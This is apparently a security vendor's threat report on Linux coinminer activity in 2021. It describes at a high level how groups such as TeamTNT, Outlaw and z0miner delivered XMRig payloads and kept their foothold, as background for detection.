Editors’ note: While the analysis and detection opportunities remain applicable, this page has not been updated since 2022.
While coinminers affect all operating systems, they made up the majority of the threats we saw on Linux environments in 2021, just as we’ve seen in years prior. As Log4j vulnerabilities consumed the information security news cycle in December 2021, researchers reported adversaries exploiting Log4j to deliver XMRig payloads and other coinminers. Being able to detect and respond to common threats like coinminers will help any blue team detect a wide range of activity—even when it emanates from unknown exploits.
Many of our Linux coinminer detections began with a Secure Shell (SSH) daemon or a web server process. While we often did not know the exact method of initial access, the intrusion chains we observed suggested that many of them began with weak user authentication or exploitation of web applications. After gaining initial access, adversaries usually leveraged system utilities such as
wget to download additional utilities like shell scripts and coinmining binaries from external sources.
The shell scripts we identified performed various actions, including host reconnaissance, inhibition of competing miners, defense evasion, and persistence. Two common persistence methods we’ve observed with miner threats like Kinsing and TeamTNT are adding SSH keys to a user’s
authorized_keys file and creating scheduled tasks via the
crontab command, two relatively easy techniques. A single shell command can be added to a script and establish hooks without much effort on the part of the adversary.
The coinmining binaries that we observed most commonly were XMRig payloads, which were often delivered by adversaries who targeted unpatched endpoints. We observed threats such as Outlaw authenticating via SSH to endpoints, presumably as a result of brute-force attempts, followed by executing shell scripts that initiated XMRig payloads named
kswapd0. We also saw z0miner exploiting vulnerabilities in Confluence to deploy XMRig payloads by executing various shell scripts.
Finally, Bird Miner tried to execute XMRig payloads on macOS hosts by using Qemu to emulate a Linux environment. No matter how elaborate their initial access techniques, the commonality between these threats is XMRig payloads. Due to its popularity, XMRig artifacts provide excellent opportunities for detection, including several discussed below.